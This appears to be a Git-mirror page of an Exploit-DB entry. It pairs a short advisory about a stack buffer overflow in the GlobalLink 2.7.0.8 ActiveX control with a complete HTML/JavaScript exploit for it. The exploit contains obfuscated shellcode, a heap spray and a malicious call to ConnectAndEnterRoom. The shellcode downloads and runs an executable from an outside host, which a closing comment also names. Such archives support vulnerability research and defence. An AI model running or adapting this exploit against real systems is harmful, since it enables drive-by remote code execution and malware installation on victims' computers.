bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/30720.html
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

9 lines
No EOL
5.2 KiB
HTML
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

source: https://www.securityfocus.com/bid/26244/info
GlobalLink is prone to a stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in denial-of-service conditions.
GlobalLink 2.7.0.8 is affected by this issue; other versions may also be vulnerable.
<body> <script>window.onerror=function(){return true;}</script> <object classid="clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69" style='display:none' id='target'></object> <SCRIPT language="javascript"> var shellcode = unescape(""+""+""+"%u9090"+""+""+""+"%u9090"+ ""+""+""+"%uefe9"+""+""+"%u0000"+""+""+"%u5a00"+""+""+"%ua164"+""+""+"%u0030"+""+""+"%u0000"+""+""+"%u408b"+""+""+"%u8b0c" + ""+""+""+"%u1c70"+""+""+"%u8bad"+""+""+"%u0840"+""+""+"%ud88b"+""+""+"%u738b"+""+""+"%u8b3c"+""+""+"%u1e74"+""+""+"%u0378" + ""+""+""+"%u8bf3"+""+""+"%u207e"+""+""+"%ufb03"+""+""+"%u4e8b"+""+""+"%u3314"+""+""+"%u56ed"+""+""+"%u5157"+""+""+"%u3f8b" + ""+""+""+"%ufb03"+""+""+"%uf28b"+""+""+"%u0e6a"+""+""+"%uf359"+""+""+"%u74a6"+""+""+"%u5908"+""+""+"%u835f"+""+""+"%u04c7" + ""+""+""+"%ue245"+""+""+"%u59e9"+""+""+"%u5e5f"+""+""+"%ucd8b"+""+""+"%u468b"+""+""+"%u0324"+""+""+"%ud1c3"+""+""+"%u03e1" + ""+""+""+"%u33c1"+""+""+"%u66c9"+""+""+"%u088b"+""+""+"%u468b"+""+""+"%u031c"+""+""+"%uc1c3"+""+""+"%u02e1"+""+""+"%uc103" + ""+""+""+"%u008b%uc303"+""+""+"%ufa8b"+""+""+"%uf78b"+""+""+"%uc683"+""+""+"%u8b0e"+""+""+"%u6ad0"+""+""+"%u5904" + ""+""+""+"%u6ae8"+""+""+"%u0000"+""+""+"%u8300"+""+""+"%u0dc6"+""+""+"%u5652"+""+""+"%u57ff"+""+""+"%u5afc"+""+""+"%ud88b" + ""+""+""+"%u016a"+""+""+"%ue859"+""+""+"%u0057"+""+""+"%u0000"+""+""+"%uc683"+""+""+"%u5613"+""+""+"%u8046"+""+""+"%u803e" + ""+""+""+"%ufa75"+""+""+"%u3680"+""+""+"%u5e80"+""+""+"%uec83"+""+""+"%u8b40"+""+""+"%uc7dc"+""+""+"%u6303"+""+""+"%u646d" + ""+""+""+"%u4320"+""+""+"%u4343"+""+""+"%u6643"+""+""+"%u03c7"+""+""+"%u632f"+""+""+"%u4343"+""+""+"%u03c6"+""+""+"%u4320" + ""+""+""+"%u206a"+""+""+"%uff53"+""+""+"%uec57"+""+""+"%u04c7"+""+""+"%u5c03"+""+""+"%u2e61"+""+""+"%uc765"+""+""+"%u0344" + ""+""+""+"%u7804"+""+""+"%u0065"+""+""+"%u3300"+""+""+"%u50c0"+""+""+"%u5350"+""+""+"%u5056"+""+""+"%u57ff"+""+""+"%u8bfc" + ""+""+""+"%u6adc"+""+""+"%u5300%u57ff"+""+""+"%u68f0"+""+""+"%u2451"+""+""+"%u0040"+""+""+"%uff58"+""+""+"%u33d0" + ""+""+""+"%uacc0"+""+""+"%uc085"+""+""+"%uf975"+""+""+"%u5251"+""+""+"%u5356"+""+""+"%ud2ff"+""+""+"%u595a"+""+""+"%ue2ab" + ""+""+""+"%u33ee"+""+""+"%uc3c0"+""+""+"%u0ce8"+""+""+"%uffff"+""+""+"%u47ff"+""+""+"%u7465"+""+""+"%u7250"+""+""+"%u636f" + ""+""+""+"%u6441"+""+""+"%u7264"+""+""+"%u7365"+""+""+"%u0073"+""+""+"%u6547"+""+""+"%u5374"+""+""+"%u7379"+""+""+"%u6574" + ""+""+""+"%u446d"+""+""+"%u7269"+""+""+"%u6365"+""+""+"%u6f74"+""+""+"%u7972"+""+""+"%u0041"+""+""+"%u6957"+""+""+"%u456e" + ""+""+""+"%u6578"+""+""+"%u0063"+""+""+"%u7845"+""+""+"%u7469"+""+""+"%u6854"+""+""+"%u6572"+""+""+"%u6461"+""+""+"%u4c00" + ""+""+""+"%u616f"+""+""+"%u4c64"+""+""+"%u6269"+""+""+"%u6172%u7972"+""+""+"%u0041"+""+""+"%u7275"+""+""+"%u6d6c" + ""+""+""+"%u6e6f"+""+""+"%u5500"+""+""+"%u4c52"+""+""+"%u6f44"+""+""+"%u6e77"+""+""+"%u6f6c"+""+""+"%u6461"+""+""+"%u6f54" + ""+""+""+"%u6946"+""+""+"%u656c"+""+""+"%u0041"+""+""+"%u7468"+""+""+"%u7074"+""+""+"%u2f3a"+""+""+"%u702f"+""+""+"%u6369" + ""+""+""+"%u312e%u2e36"+""+""+"%u6776"+""+""+"%u532f"+""+""+"%u3633"+""+""+"%u2f38"+""+""+"%u3353"+""+""+"%u3836" + ""+""+""+"%u2e32"+""+""+"%u7865"+""+""+"%u8065"+""+""+"%u0000"); </script> <SCRIPT language="javascript"> var fsk51d2sl = "63e23c122"; var bigblock = unescape(""+""+"%u9090"+""+"%u9090"); var fsk51d2sl = "63e23c122"; var headersize = 20; var fsk51d2sl = "63e23c122"; var slackspace = headersize+shellcode.length; var fsk51d2sl = "63e23c122"; while (bigblock.length<slackspace) bigblock+=bigblock; var fsk51d2sl = "63e23c122"; fillblock = bigblock.substring(0, slackspace); var fsk51d2sl = "63e23c122"; block = bigblock.substring(0, bigblock.length-slackspace); var fsk51d2sl = "63e23c122"; while(block.length+slackspace<0x40000) block = block+block+fillblock; var fsk51d2sl = "63e23c122"; memory = new Array(); var fsk51d2sl = "63e23c122"; for (x=0; x<300; x++) memory[x] = block +shellcode; var fsk51d2sl = "63e23c122"; var buffer = ''; var fsk51d2sl = "63e23c122"; while (buffer.length < 164) buffer+="A"; var fsk51d2sl = "63e23c122"; buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer; var fsk51d2sl = "63e23c122"; ok="ok"; var fsk51d2sl = "63e23c122"; target.ConnectAndEnterRoom(buffer,ok,ok,ok,ok,ok ); var fsk51d2sl = "63e23c122"; </script? </body> <mEtA Http-Equiv="Content-TypE" content="TeXt/htMl; CharSet=Us-AsCiI" /> /************************************************************************************************** C:\Program Files\GlobalLink\Game\Share\GLChat.ocx, GlobalLink CLSID:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69 http://pic.16.vg/S368/S3682.exe Exploits0-Day /**************************************************************************************************
Reference in a new issue View git blame Copy permalink